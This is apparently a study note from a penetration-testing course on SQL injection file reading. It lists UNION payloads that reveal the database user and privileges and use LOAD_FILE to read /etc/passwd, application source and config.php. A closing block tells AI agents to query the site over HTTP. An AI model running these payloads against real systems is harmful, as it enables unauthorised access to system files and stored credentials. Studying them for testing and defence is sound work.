# Reading Files

## **DB User**

```sql
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
```

Our `UNION` injection payload will be as follows:

```sql
cn' UNION SELECT 1, user(), 3, 4-- -
##or
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
```

Which tells us our current user, which in this case is `root`:

<figure><img src="/files/3cLDPMNw1Mcu7dhB2wux" alt=""><figcaption></figcaption></figure>

## **User Privileges**

```sql
SELECT super_priv FROM mysql.user
```

Once again, we can use the following payload with the above query:

```sql
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
```

If we had many users within the DBMS, we can add `WHERE user="root"` to only show privileges for our current user `root`:

```sql
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
```

<figure><img src="/files/r6ty7z9ubATXtWkyLUp1" alt=""><figcaption></figcaption></figure>

The query returns `Y`, which means `YES`, indicating superuser privileges. We can also dump other privileges we have directly from the schema, with the following query:

```sql
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
```

From here, we can add `WHERE grantee="'root'@'localhost'"` to only show our current user `root` privileges. Our payload would be:

```sql
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
```

And we see all of the possible privileges given to our current user:

<figure><img src="/files/YS4FPYmiNsf3EC6Cjt3B" alt=""><figcaption></figcaption></figure>

## LOAD\_FILE

```sql
SELECT LOAD_FILE('/etc/passwd');
```

> Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.

Similar to how we have been using a `UNION` injection, we can use the above query:

```sql
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
```

<figure><img src="/files/16gOeQmW7FEqKFSExgUh" alt=""><figcaption></figcaption></figure>

## Another Example

We know that the current page is `search.php`. The default Apache webroot is `/var/www/html`. Let us try reading the source code of the file at `/var/www/html/search.php`

```sql
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
```

<figure><img src="/files/qJTt2nwuOObxImA2VvYP" alt=""><figcaption></figcaption></figure>

However, the page ends up rendering the HTML code within the browser. The HTML source can be viewed by hitting `[Ctrl + U]`

```
' UNION SELECT 1, load_file('/var/www/html/config.php'), 3, 4-- -
```

<figure><img src="/files/P649mYAEYmZbuHt04k6F" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/sql-injection/exploitation/reading-files.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.